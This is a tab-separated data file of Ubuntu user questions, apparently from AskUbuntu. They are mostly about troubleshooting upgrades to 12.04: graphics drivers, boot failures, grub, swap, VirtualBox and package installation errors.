125969	no 12.04 upgrade choice from 10.04	on both my laptops ( running 10.04 ) , all the latest updates are installed , in the settings `` long term support releases only '' is ticked , and yet the proposition to upgrade to 12.04 never shows up . i 've also tried with `` do-release-upgrade '' from the cli , which gives me : '' checking for a new ubuntu release no new release found '' what 's going on ? should i upgrade through the livecd , or is there anything i 've forgotten ?
125973	how to set oxygen-gtk font preferences	so i upgrade to 12.04 ( clean install ) from 11.04 . i got used to many things in 11.04 , one of which is this great work oxygen-gtk i knew there is gtk3 version , and expected everything to be smooth for some reason . unfortunately , i soon found out that i 'll need not only gtk3 version of this package , but also gtk2 version . this is my issue : oxygen-gtk3 uses white font color on light background how can i set it to use black font ?
125976	skype core dump	i got this issue after upgrading to 12.04 from 11.10 : sometimes , it is not clear what trigger the problem , i start skype and i got this : : ~ $ skype segmentation fault ( core dumped ) if i uninstall and re-install it works for a while but after sometimes/reboot ( not a fixed time ) same problem come again .
125980	how do i install xulrunner ?	i am trying to migrate a virtual machine i use for my classes at the university from 10.04 to 12.04 and in that i am using xulrunner so that first , i can have sqlitemanager as a stand alone app next , knime can provide help for its nodes i tried adding the the mozilla ppa as described in some posts , e.g . here or here , but when i search for xulrunner in synaptic i get no match . i read in this link , that xulrunner was left out intentionally , which , frankly , i think is a bad decision ! anyway , does anyone know a way out of this , i.e . how to get xulrunner ?
125982	can i get man pages without installing the corresponding packages ?	is there a way to have man pages available for commands i want without having to install the corresponding package ? for example , i want to browse the man page for emacs . and i do n't have emacs installed and prefer not to install it . i know i can visit man pages online , but i want man emacs to get me the man page . is there a way for this ?
125991	intel driver at an all time low	i have a dell latitude e5510 with an intel gpu , which works absolutely fine , until i plug in an extra monitor or projector . i have a lot of hardware to work with and up until precise , about 40 % of the hardware was displaying fine . one monitor i 'm working with ( lg e2340t-pn ) used to work with oneiric on full hd just fine . no problems at all ! after the ( clean ) installation of precise i suddenly have to use the 1680x1050 resolution . switching to 1080p just thrashes x . the monitor i use at home is a dell 20 '' ( 1680x1050 native ) . i have to switch to 1280x1024 to make my monitor work . if i do n't , my screen flickers and jitters and tries to sync ( constantly ) . the projector i use at home is a sony vpl-cx76 ( 1400x1050 ) . no problems with it , at all ! a dell projector at work simply does n't work at all ( getting no signal ) . we have a couple high end sony projectors as well ( 1080p monsters ) , that give me the same jittering as on my monitor at home . right now i 'm working on the 23 '' lg ( 1080p native , but running on 1680x1050 now ) my xrandr output : vga1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 510mm x 290mm 1920x1080 60.0 + 1680x1050 60.0* 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 j0lle @ j0lle-laptop : ~ $ lsmod | grep i915 i915 468651 3 drm_kms_helper 46978 1 i915 drm 242038 4 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 video 19596 1 i915 j0lle @ j0lle-laptop : ~ $ dpkg -l xserver-xorg-video-intel xserver-xorg-video-intel 2:2.17.0-1ubuntu4 x.org x server -- intel i8xx , i9xx display driver i 've been looking for months and i ca n't find a case like mine ... some are quite similar , but never the same . i tried different kernels , different drivers ( xorg-edgers ) , some patches , nothing worked so far . i 'm willing to try anything to get this resolved ! update ! ! ! https : //bugs.freedesktop.org/show_bug.cgi ? id=36515 # c36 my 1080p is working again ! will do more tests with other devices asap update2 i knew it was too good to be true . 1080p only works when i adjust it with xrandr . xrandr then leaves me with two partially overlapping desktops . if i adjust it with 'displays ' it 's still broken . update3 i filed this bug : https : //bugs.freedesktop.org/show_bug.cgi ? id=49220
125994	install ruby 1.9.2-p180 via rvm on ubuntu 12.04	i just upgraded to the newest ubuntu release and this broke my ruby on rails setup . i would like to install ruby 1.9.2-p180 now via rvm : rvm install ruby-1.9.2-p180 this is cancelled due to some errors with openssl : ossl_ssl.c:110:1 : fehler : »sslv2_method« ist hier nicht deklariert ( nicht in einer funktion ) ossl_ssl.c:111:1 : fehler : »sslv2_server_method« ist hier nicht deklariert ( nicht in einer funktion ) ossl_ssl.c:112:1 : fehler : »sslv2_client_method« ist hier nicht deklariert ( nicht in einer funktion ) make [ 1 ] : *** [ ossl_ssl.o ] fehler 1 sorry as it is in german partially . i can give an english error message if that is necessary . what can i do to get a successful installation ?
125997	reinstall of ubuntu 11.10 failed and partitions nor hard disk not being recognized	i had ubuntu 11.10 installed on my samsung r519 . it was working fine and i also had cinammon desktop and kde installed , but eventually settled with kde . i had my hard drive partitioned in 3 parts i think , one for boot and the others for file storage . so i would think that ubuntu would simply resintall on the boot partition since it was they who suggested i divide up my hard drive this way . after a few months however upon bootup ubuntu started warning me that there were disk errors . when i clicked check and fix , it would apparently never solve the problem . i never bothered to research the disk errors , but just kept ignoring them ... until ubuntu eventually crashed on april 26 . so i setup a usb install disk and proceeded to reinstall ubuntu and save my paritions and data . however at ''restoring previous installations '' ubuntu hung for several hours then reported that the installer crashed . now when i try to reinstall it is not detecting my partitions or the disk period for that matter . even at bios setup my computer does n't seem to detect my internal hard drive . it does detect my external harddrive though . so i know the problem is my internal hd . what can i do to get ubuntu or my pc to detect my drive again ? most of my personal data is backed up so if needs be i do n't mind wiping the drive . update - when i try to reboot from the disk , it says can not read master boot record or sector 0 .
125998	whats the difference between the 12.04 cd and dvd versions ?	i found myself in confusion when i saw a cd version and a dvd version of the ubuntu 12.04 . i once thought that dvd will include both 32-bit and 64-bit versions , but , actually dvd version also asked me to choose between the two architectures ... any help appreciated .
125999	how can i disable apper ?	since 12.04 came out , `` apper '' bothers me every five minutes with a popup `` update now ! ! ! ! ! '' how can i turn this annoyance off ?
126001	5 year support ?	i understand that ubuntu 12.04 will be supported for 5 years . is this true for all other variations of ubuntu too ? for example , will lubuntu 12.04 , xubuntu 12.04 and the rest also be supported for 5 years ? and if not , does that mean it 's better to install ubuntu 12.04 and then maybe sudo aptitude install lxde or sudo aptitude install xfce
126002	unity panel oneiric behavior on precise	one of the good thing of ubuntu 11.10 was to see the launcher except when a window was in fullscreen . with precise , the new behavior is always visible or always hidden . how to make it act as before ?
126008	having problem to login after upgrading from 11.10 to 12.04	i just update to 12.04 from 11.10 and i get to the login screen w/o problems . when i enter my password the screen turns black and returns to the login screen half a second later . there is a related question out there which was solved by creating more space on the disk but my disks ( or rather partitions ) are all below 30 % . i can log in as guest . i can also login at the cmd prompt ( going to tty with alt+ctrl+f1 ) with my normal user credentials . when logged in as guest i can also install programs using my normal account password . there is the normal authentication error when i mistype my password so i 'm also sure the password works . any suggestions ?
126011	what gnome packages ( applications ) are missing in ubuntu 12.04 ?	as it is , what gnome applications are missing in ubuntu 12.04 ? ( edit : what programs are in the gnome package of ubuntu - which is not installed automatically ? ) and will there be any advantage of installing them ? thanks .
126018	adding a new swap file . how to edit fstab to enable swap after reboot ?	i 've deleted my existing swap partition due to some partitioning problem . i do n't have a swap space now so i 've created a swap file with : dd if=/dev/zero of=/root/myswapfile bs=1m count=1024 here 's after swapon -s : /root/myswapfile file 1048572 1320 -1 now i want to edit my /etc/fstab to enable the swap file after reboot . please tell me how to edit my fstab file .
126019	intel graphics card not detected in ubuntu 12.04	i 've installed ubuntu 12.04 64bin alongside windows through wubi . but this version is not using intel display drivers . the graphics section in details menu in system settings shows drivers as 'unknown ' and experience as standard . hence the overall experience in ubuntu 12.04 is slow . the output of lspci | grep vga is 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 )
126025	great amount of diskspace is used and i hardly have any files	i 've recently installed lubuntu and copied a great amount of things to it and deleted them . the issue is that the diskspace is still taken . i 've emptied the trash too . for some reason the root folder ( / ) and within that the `` home '' folder ... ..seems to contain all those deleted files , although i can not locate them . can anyone tell me why this is and how i could solve it ? note : i 've just found the folder where all the `` extra '' space is ... ... home/username/.local/share/trash/expunged ... .. i deleted the contents of the folder , restarted the laptop and the space is still not liberated .
126030	totem not playing certain videos in 12.04	the videos that work properly in 10.04 are not working in 12.04. haris @ psycho : ~/music $ file captain\ tsubasa\ 2\ nes\ -\ 21\ -\ coimbra_s\ theme.mp4 captain tsubasa 2 nes - 21 - coimbra_s theme.mp4 : iso media , mpeg v4 system , version 2 haris @ psycho : ~/music $ file captain\ tsubasa\ 2\ nes\ music\ -\ 01\ opening.mp4 captain tsubasa 2 nes music - 01 opening.mp4 : iso media , mpeg v4 system , version 2 haris @ psycho : ~/music $ file batman\ \ ( nes\ ) \ music\ -\ continue\ theme.mp4 batman ( nes ) music - continue theme.mp4 : iso media , mpeg v4 system , version 2 haris @ psycho : ~/music $ file starship\ -\ nothing_s\ gon na \ stop\ us\ now\ \ ( mannequin\ ) \ lyrics.mp4 starship - nothing_s gon na stop us now ( mannequin ) lyrics.mp4 : iso media , mpeg v4 system , version 2 the third and fourth videos are not even being played by totem while for the second one , i can hear the audio but ca n't see the video . the first one plays well enough . once again , all these videos work without any problems in 10.04 . should i report this as a bug or can it be rectified ?
126036	i ca n't start my computer after installing 12.04	after i installed ubuntu 12.04 from live usb . the installation went very well . but when i restarted my computer , i could n't boot into it . i have to boot it from live usb . what could be the reason and how to solve this ?
126044	after upgrade to 12.04 the login takes forever	i recently upgraded from xubuntu 11.10 to 12.04 . since then it takes a very long time for me to login . the time it takes to get to the login screen is normal but after i type in my password it takes over a minute to get me to my desktop . in 11.10 this only took a couple of seconds . how to solve this ?
126046	realtek alc272 mic not working on lenovo s10-3	lspci output 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rec 02 ) when doing alsactl init , it shows alc272 i 've been using it since ubuntu 11.04 and 11.10 and mic was working , but since the update to 12.04 the microphone problem appears . i tried to compile the realtek alsa-driver for hda-intel but still the same , any idea ?
126051	how to resize fonts ?	after upgrading to 12.04 my fonts are now huge . the only way i have found to solve it , is by running the following command after startup : $ sudo gnome-settings-daemon ** ( process:3299 ) : warning ** : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( gnome-settings-daemon:3285 ) : warning ** : unable to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( gnome-settings-daemon:3285 ) : warning ** : failed to get session for pid : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '3285' ** ( gnome-settings-daemon:3285 ) : warning ** : failed to get session for pid : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '3285' ( gnome-settings-daemon:3285 ) : color-plugin-warning ** : failed to get edid : unable to get edid for output [ 1335525273,000 , xklavier.c : xkl_engine_start_listen/ ] the backend does not require manual layout management - but it is provided by the application ( gnome-settings-daemon:3285 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-settings-daemon:3285 ) : color-plugin-warning ** : unable to get edid for xrandr-default : unable to get edid for output ( gnome-settings-daemon:3285 ) : color-plugin-warning ** : failed to reset xrandr-default gamma tables : gamma size is zero can somebody help solve this problem ? update 2 : i have the same problem in unity update 1 : attached screenshot : update 3 to follow up , i never found a solution and ended up reinstalling it all
126052	after upgrade to 12.04 - can not connect to network	upgraded this morning and the install seemed to go well but after reboot i logged back in and it appears that my network ( wired ) set up no longer works . i 've tried restarting the network manager but no joy there . any tips on how i can get this resolved ? ? ?
126053	wine claims nvidia opengl drivers not installed correctly ?	it seems like wine does n't see the nvidia propretary drivers properly . when i try to launch wine ~/.wine/drive_c/windows/system32/dxdiag.exe , dxdiag crashes immediately . it says it has problems with directx . in the terminal , i found this error message : '' err : winediag : x11drv_winegl_initopenglinfo direct rendering is disabled , most likely your opengl drivers have n't been installed correctly ( using gl renderer `` geforce gtx 470/pcie/sse2 '' , version `` 1.4 ( 2.1.2 nvidia 295.40 ) '' ) . '' and with glxinfo | grep `` opengl version i receive : opengl version string : 4.2.0 nvidia 295.40 anyone has any idea about this problem ? ps : i use blender and the 3d performances are perfect .
126054	how do i burn the ubuntu iso using windows ?	i have downloaded ubuntu 12.04 iso image but i am not sure how to burn it . can i burn it by right clicking and selecting burn with nero option or do i need any special software . i am using windows 7 32bit . it would be nice of you if you can give me the step by step instruction !
126065	after upgrading to 12.04 i ca n't get to the login screen	i can not go pass the black screen and the following shows up on my screen after upgrading and rebooting with the ubuntu update manager from 11.10 to 12.04 : ata_id [ 27 ] : hdio_get_identity failed for '/dev/sdb/ ' : invalid argument *stopping save kernel messages setting up x font server socket directory /tmp/.font-unix ... done . starting x font server : xfs . rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s25 bluetooth start inid : unkown job : s25 bluetooth since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s25bluetooth *pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned *checking battery state ... [ ok ] after this nothing happens anymore . i even tried booting from different linux versions and also from recovery mode . i 've tried repairing the packages and even updating the grub loader . *i have ubuntu in an external hard drive but there were never any problems with booting before the upgrade . *also , it seems to be something to do with invoking init scripts rather than other problems . ( if u think it is n't , still do try to help me solve the problem . ) please help !
126073	boot to text mode by default on liveusb ?	recently , i try to remaster my lucyd with uck . everything is ok ! just wondering , by pressing esc i can see all the process . so , is there any way to make it happen by default , to boot text mode on live usb . thanks anyway..
126075	should i upgrade my dell mini netbook from 10.04 to 12.04 ?	what do you think , does it worth it to upgrade to 12.04 ? preinstalled 10.04 works very well . i am thinking about performance issues , i would have the 12.04 as on my bigger machines but do n't know how it will run on a netbook any ideas , experiences ?
126076	upgrade option unavailable when upgrading from 11.10 to 12.04 from a usb stick	i created a usb startup disk from iso and booted using that to upgrade my 11.10 installation . but when i am not able to select upgrade from ubuntu 11.10 to ubuntu 12.04 . the radio button can not be selected . i am doing a network upgrade now .
126077	time tracker - how to use in unity ( precise )	firstly ( unrelated ) , i been using ubuntu forums for like forever and first time using this site ... absolutely awesome +1 . anyway , back in university i lived by hamster tracking , this was such a great tool and since i had to prove how long i spent on projects , it was amazing for that use . the problem i now have is that tracking tool is still in the precise repos , but unlike it 's older pre-unity version , it no longer comes up in the taskbar . is there any hack i can use to add it there ?
126079	mount folder using ssh twice ( first ssh to gate , then from gate to workstation )	my current situation is that i have my personal laptop , and i there is a workstation i need to be able to mount . but before i can get to that workstation , i first need to ssh into the gate of the network . so basically , if i only want to connect to the workstation i need to do this : ssh username @ gate $ ssh username @ workstation is there a way for me to mount the workstation directly into ubuntu ? so i can work on my documents on the workstation ? any ideas on how to do this ?
126080	intel graphics problem after upgrading from 11.10 to 12.04	i 've just upgraded ubuntu system from 11.10 to 12.04 . in 11.10 graphics were okay . i was running unity 3d and now after upgrade i just got unity 2d and max resolution 1024x768 . how can i fix this ?
126086	can run 3d games but not unity ( only 2d version ) . geforce 8800 gts 12.04	i 'm having trouble getting unity to run properly . i can play hon but if i log in with unity the system becomes slow and laggy.i think this system had earlier versions of unity running before but now it does not . one day in version 11.04 it started freezing so i upgraded to 12.04 to see if the issue would disappear by itself but it did n't . i 'm using the drivers included in additional drivers , `` nvidia accelerated graphics driver ( version current ) [ recommended ] '' . i also got this error message when i logged in with unity 2d that window decoration has stopped working or something . it also said something about compiz . how do i fix this ?
126087	how can i change global font colors in ubuntu 12.04 ?	after the 12.04 upgrade , there 's a problem with the contrast between the font color and the background color . i had the same problem when i upgraded from 11.04 to 11.10 , and fixed it at that time , however i do n't remember what i did . now it 's back . can somebody help ?
126088	totem controls can not be seen in fullscreen mode	while playing videos using totem , the controls ( as well as the mouse pointer ) can not be seen while switching to the fullscreen mode . however , if you hit `` space '' , the video pauses and the controls appear . you can see the mouse pointer only when it hovers over the controls . should i report this as a bug or is there a way to rectify this ?
126090	lubuntu and remote desktop	i have a ssh address that i connect through command line , but i would like to have a gui option to make my work easier . so is it possible to connect through ssh using remote desktop on lubuntu 11.10 ? thanks
126091	live usb not booting	i 've downloaded an iso file of ubuntu 12.04 and created a live usb but when i try to boot from usb this error comes up . `` boot error '' what should i do ?
126092	where are the daily builds for chromium for 12.04 ?	i am running now ubuntu 12.04 precise pangolin but i still have today problem with this sources for chromium . anyone have the daily-dev apt sources for chromium ? failed to fetch http : //ppa.launchpad.net/chromiumdaily/dev/ubuntu/dists/precise/main/source/sources
126096	i can not upgrade to ubuntu 12.04 from 11.10	trying the upgrade results in the following message : '' could not download the release notes-please check your internet connection '' my internet is working fine . having just downloaded various updates . any suggestions how to fix this ?
126097	ubuntu 12.04 gitosis no longer available	i have an ubuntu 11.10 box running git server using gitosis , installed as described here https : //help.ubuntu.com/community/git i just tried upgrading to 12.04 doing a do-release-upgrade , and the gitosis package was removed and is no longer available in apt-get . this is the first time this happens to me , so i 'm not sure how to proceed . luckily , the box is virtualized , and i reverted to the backup , so no harm was done . but still , i want to upgrade and keep gitosis installed . what 's the recommended way to proceed ?
126100	switch workspaces individually on each monitor	in 12.04 with a two monitor setup ( using unity and compiz ) , is it possible to switch workspaces individually for each monitor ?
126108	how can i install a 32bit library on a 64bit system	i use winbind on 12.04 64bit , but some 32bit programs ( like acroread ) need the 32bit version of libnss_windbind ( from the package libpam_winbind ) . how can i install the 32bit version of libpam_winbind on my 64bit system ?
126111	ubuntu 12.04 can not start	i just installed ubuntu 12.04 64bit , and i can not start it . i tried twice . the first time , i used a cd i burned . ( the cd works for my another computer , so it is ok. ) after wubi did something in windows , it rebooted . then the screen was stuck where there is an ubuntu logo at the center and 5 dots below . i waited for more than half hour , it was still there and nothing happened . the second time , i installed 11.10 , then upgrade to 12.04 in a the newly install 11.10 . btw , the 11.10 did start . after upgrading , i rebooted the computer , it was stuck at the same place . any one can help me on this ? the computer is amd phenom ii x4 965 + ati radeon hd4870 . thanks a lot !
126114	while my laptop was upgrading to 12.04 the comp . got dissconnected from power and now it wont upgrade	so i was upgrading my computer from ubuntu 11.10 to 12.04 , it was about half way through with the upgrade when the plug got disconnected ( by accident ) and now it `` ca n't '' finish those upgrades . i ca n't choose upgrade to 12.04 in the update manager anymore but still i am not running on 12.04 . any ideas ? i hope i do not need to make a clean install . olafur vidir
126118	freezing after fresh install of ubuntu	hi i have installed ubuntu but after 5 minutes it freezes , i cant do anything except move my mouse like open a new program , open a new tab e.t.c i am on ubuntu 12.04lts final beta any help would be greatly appreciated my computer specs : hp compaq 6715b amd turion64x2 cpu ati radeon x1250 3g of ram thanks in advance -goeagles5
126119	battery monitor on fluxbox	i was using fluxbox on my notebook , but it missed battery indicator.is there any battery monitor on fluxbox ? [ solved ] install wmbattery then add it to startup script .
126121	is `` shut down '' missing from dash a bug or feature ?	first and foremost ; i did a clean install of 12.04 , so this is not an upgrade issue : - ) in 11.10 i used to shut down the computer via the dash ( superkey and then type shut and enter ) . this does not work for me in 12.04 . is there something i need to activate ? did someone want that removed from 12.04 ? or is it a bug ? i have googled and searched askubuntu for it but could not find an answer
126124	is it possible to disable the super+ < number > shortcuts that switch to apps in 12.04 ?	in 12.04 ( and prior , i believe ) , + ( like windows+1 ) will switch to the first app in the launchbar . can i disable this somewhere ? i like to use super+number to switch between workspaces .
126130	after new install 12.04 black screen with blinking cursor	i installed 12.04 and i got after boot black screen.next i started in filesafe mode but filesafex ( all options ) do not work ( black screen.then i started root shell , remounted rw hd and on prompt built xorg.conf with : $ > x -configure i have edited xorg.conf to delete obsolete monitors and screens . after reboot i get black screen with blinking cursor ( no terminals ) what can i do ? how to edit xorg.conf when this could be a problem ? # # heading # # hardware : radeon hd5470 and i3 with i915
126131	ca n't upgrade 12.04 from 11.04	i have an 11.04 machine , and i 'd like to upgrade to 12.04 . i 'm using the update manager to do so . it gets to the `` setting new software channels '' step when i get this error : the complete description is : w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . what do i do ?
126132	errors when installing mysql server 5.1	i 'm trying to install mysql server , and i 'm getting the following error . sudo apt-get install mysql-server-5.1 reading package lists ... done building dependency tree reading state information ... done suggested packages : tinyca mailx the following new packages will be installed : mysql-server-5.1 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 0 b/6,259 kb of archives . after this operation , 13.6 mb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package mysql-server-5.1 . ( reading database ... 158432 files and directories currently installed . ) unpacking mysql-server-5.1 ( from ... /mysql-server-5.1_5.1.62-0ubuntu0.11.10.1_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up mysql-server-5.1 ( 5.1.62-0ubuntu0.11.10.1 ) ... 120427 19:04:07 [ note ] plugin 'federated ' is disabled . 120427 19:04:07 innodb : initializing buffer pool , size = 8.0m 120427 19:04:07 innodb : completed initialization of buffer pool 120427 19:04:07 innodb : started ; log sequence number 0 44233 120427 19:04:07 innodb : starting shutdown ... 120427 19:04:13 innodb : shutdown completed ; log sequence number 0 44233 start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i install mysql-server ? someone pls help me
126135	how to set hud to do this ?	i do n't want to use launcher at all , i just want to use hud . for example , i press alt and write chr and press enter and it will open chrome . or i press folder_name + enter and it opens that folder . but at the moment , it seems i ca n't do that . is it possible to set it somehow ? that would be awesome , thank you .
126140	ubuntu 12.04 responsiveness very slow on nvidia 8800 ?	just installed 12.04 . this is the first time i run ubuntu with the unity ui , not a pleasant experience . the responsiveness is extremely slow ( 10s after a mouseclick ) , the screen flickers . all right after logging in . switching the display driver from nvidia current to post-release does n't help at all . what now ? ca n't go back , but ubuntu is useless to me right now . what can i do ? ( the system is a intel 4x2.4ghz with 4gb ram and a nvidia 8800 . )
126141	why does 11.04-to-12.10 upgrade on openvz vps fail with `` libc - kernel 2.6.24 '' error ?	i have an openvz vps , and am trying to upgrade ubuntu server from 11.10 to 12.04 . but the upgrade aborts half-way with this error : warning : this version of the gnu libc requires kernel version 2.6.24 or later . please upgrade your kernel before installing glibc . the installation of a 2.6 kernel _could_ ask you to install a new libc first , this is not a bug , and should *not* be reported . in that case , please add lenny sources to your /etc/apt/sources.list and run : apt-get install -t lenny linux-image-2.6 then reboot into this new kernel , and proceed with your upgrade dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 no apport report written because maxreports is reached already could not install the upgrades the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . upgrade complete the upgrade has completed but there were errors during the upgrade process . to continue please press [ enter ] === command detached from window ( thu apr 26 10:31:16 2012 ) === === command terminated with exit status 1 ( thu apr 26 10:31:16 2012 ) ===
126146	i ca n't install grub2	i ca n't install grub2 on my system . i followed the guide , but when i chroot on my ubuntu partition and type : grub-install /dev/sdb i get this error : root @ ubuntu : / # grub-install /dev/sdb /usr/sbin/grub-setup : error : hd0 appears to contain a iso9660 filesystem which is n't known to reserve space for dos-style boot . installing grub there could result in filesystem destruction if valuable data is overwritten by grub-setup ( -- skip-fs-probe disables this check , use at your own risk ) . here is sudo fdisk -l output : disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6af447e6 device boot start end blocks id system /dev/sdb1 * 2048 781459455 390728704 7 hpfs/ntfs/exfat /dev/sdb2 781459456 789272575 3906560 82 linux swap / solaris /dev/sdb3 789272576 976773119 93750272 83 linux and sudo blkid : /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' ubuntu 12.04 lts i386 '' type= '' iso9660 '' /dev/sdb1 : uuid= '' 08e1afd109c12fe4 '' type= '' ntfs '' /dev/sdb2 : uuid= '' 1170bc3a-8b75-4c6b-8749-12cecb6db54d '' type= '' swap '' /dev/sdb3 : uuid= '' 881202f2-1f9b-4f10-9af5-90424a8dd362 '' type= '' ext3 ''
126148	gnome ( or maybe unity ? ) ignoring gtkrc settings	this is related to the recurring `` white on black tooltips '' question . until yesterday i was able to change tooltip colors ( and fix ui element padding ) using a specific gtkrc file for eclipse , as suggested by this blog post . my gtkrc looks like ( slightly reformatted ) gtk-color-scheme = `` base_color : # ffffff\nfg_color : # 4c4c4c\n tooltip_fg_color : # 000000\nselected_bg_color : # f07746\n selected_fg_color : # ffffff\ntext_color : # 3c3c3c\n bg_color : # f2f1f0\ntooltip_bg_color : # f5f5b5\nlink_color : # dd4814 ... and i run eclipse with the command gtk2_rc_files=~/.themes/eclipse.gtkrc eclipse this worked fine for 11.10 and still works on 12.04 , with the exception of tooltip colors , i.e . eclipse starts with the tweaked ui elements but still uses the default white on black tooltips . editing the system-wide gtkrc file at /usr/share/themes/ambiance/gtk-2.0/gtkrc as suggested by this answer works fine , but i 'd rather not do it and besides i still have no clue as to why eclipse will pick up all my modifications to gtkrc except the gtk-color-scheme setting . does anyone know what 's wrong ?
126149	inconsistent booting problem 12.04lts on asus u46e ral7	the laptop is dual booting with windows 7 and ubuntu 11.10 . for 11.10 to boot , i had to add 'nolapic ' in grub boot options . i downloaded 12.04lts livecd yesterday and made a cd and a bootable usb stick . with both usb and livecd , occasionally i can boot into 12.04 . but many times , the boot process stuck at some point . for usb boot , sometime it works . but other times , it seems to stuck right after seeing the message : nmi watchdog enabled . takes one hw-pmu counted [ 0.408590 ] # 2 the number in [ ] changes . some times it stuck at # 2 , and sometimes at # 3 . for livecd boot , sometime it works . but when it stuck , it stuck at different places . at times , the boot process go directly to a blank screen with a blink '_ ' at up left corner . sometime it went a bit further , after showing options to try/install ubuntu then stuck with a blank screen with blink '_ ' . anything i can do to get around of this ?
126150	gnome-shell 3.4 themes not working in 12.04 ?	even themes advertised as gnome-shell 3.4 compatible have graphical issues on gnome-shell 3.4 . the main thing is that the text is black and nearly invisible , and the icons in the applications screen are crowded and in some cases overlapping . the themes did not do this before upgrade , and the default does n't do it now . i am using user theme extension , and the themes i have tried are the ambiance-color set and london smoke ( both of which are advertised as 3.4 compatible ) .
126153	how to resize partitions ?	previously , i have installed windows 7 on my 320 gb laptop with three partitions 173 , 84 and 63 gb each . the 63 gb partition was where the windows was installed . the rest were for file containers . now i changed my os to ubuntu 12.04 lts . i installed ubuntu by replacing the entire windows 7 on the 63 gb partition . the rest of the partitions remain as an ntfs windows partition and i can still access them both ( the 173 and 84 gb partitions ) . now i want to change the two partitions of windows into an ubuntu format partitions plus most importantly , i want to extend the 63 gb partition to more than a 100 gb because at the moment i am running out of memory . whenever i try to install any application , especially using wine , it always complains for a shortage of memory . how do i do the extending activity before i entirely format my laptop again and lose all the important files on my partitions ?
126155	network problem in 12.04	i am trying to install ubuntu 12.04 but when i run installer ( or livecd ) it writes that there is no connection to internet ( i don`t continue installation because ubuntu is the only os on my pc and i need internet access ) . previous versions ( 10.04 and 11.10 ) work fine . my network adapter is asus nx1001 . note : i am loading from cd and run the installer .
126160	how can i add the memtest86+ options back to the grub menu ?	after having installed the 64bit version of ubuntu 12.04 on my lenovo b570 i ran into the same problems i had when installing 11.10 with grub not playing nicely with a uefi system . i used the same technique as last time to solve the problem ( using a super grub disc livecd session to repair grub ) and my system happily dual boots between ubuntu and windows 7 however now when i boot up the grub menu only displays ubuntu , with linux 3.2.0-24-generic ubuntu , with linux 3.2.0-24-generic ( recovery mode ) previous linux versions windows 7 ( loader ) ( on /dev/sda1 ) windows recovery environment ( loader ) ( on /dev/sda4 ) i no longer see the option to use memtest86+ which was there previously , having checked in the ubuntu software center i can see that the package is installed , but how to i make the option to run it once again appear in the grub menu ? i 've tried : sudo update-grub which does n't make any difference . sudo chmod +x /etc/grub.d/20_memtest86+ results in : chmod : can not access /etc/grub.d/20_memtest86+ ' : no such file or directory and entering ls /etc/grub.d/ results in : 00_header 10_linux 30_os-prober 41_custom 05_debian_theme 20_linux_xen 40_custom readme
126169	how long before ubuntu one downloads music purchases	how long does it take on average for a song purchased through the ubuntu one music store to be downloaded to my computer ?
126170	usb stick creation	cd creator will not locate my usb stick to create 12.4 lts os . i have followed instruction on this site but without cd creator locating usb stick i am dead in the water . please help
126175	virtualbox does n't load after 12.04 upgrade	after upgrading from 11.10 to 12.04 , virtual box stopped working . i 've run the following to try to fix it : sudo aptitude update sudo aptitude install dkms sudo /etc/init.d/vboxdrv setup but when i run the last command i get : bash : /etc/init.d/vboxdrv : no such file or directory when i try sudo /etc/init.d/virtualbox start i get : * starting virtualbox kernel modules * no suitable module for running kernel found i 've also tried : sudo dkms install virtualbox/4.1.2 and got : error ! could not find module source directory . directory : /usr/src/virtualbox-4.1.2 does not exist . i 've also tried installing linux headers : sudo apt-get install linux-headers- $ ( uname -r ) but they were already installed . from what i 've read re-installing may not fix the problem . is there a way i can fix virtual box ?
126178	maximizing hdd space on dual boot fedora 16 and ubuntu 12.04 system	my question is very specific . in the screenshot here of my gparted , you can see fedora 16 installed on /dev/sda4 and ubuntu ( with the mount point `` / '' ) on /dev/sda6 . partition /dev/sda5 is taking up 48 gib of space and there seems to be nothing on it but a lost+found folder . i want to remove this partition and expand both my fedora and ubuntu partitions to use the resulting unallocated space . this is a fresh install of both operatng systems and there is no data on the computer to lose . is it safe to remove the /dev/sda5 partition and resize the other two using gparted from a live cd ?
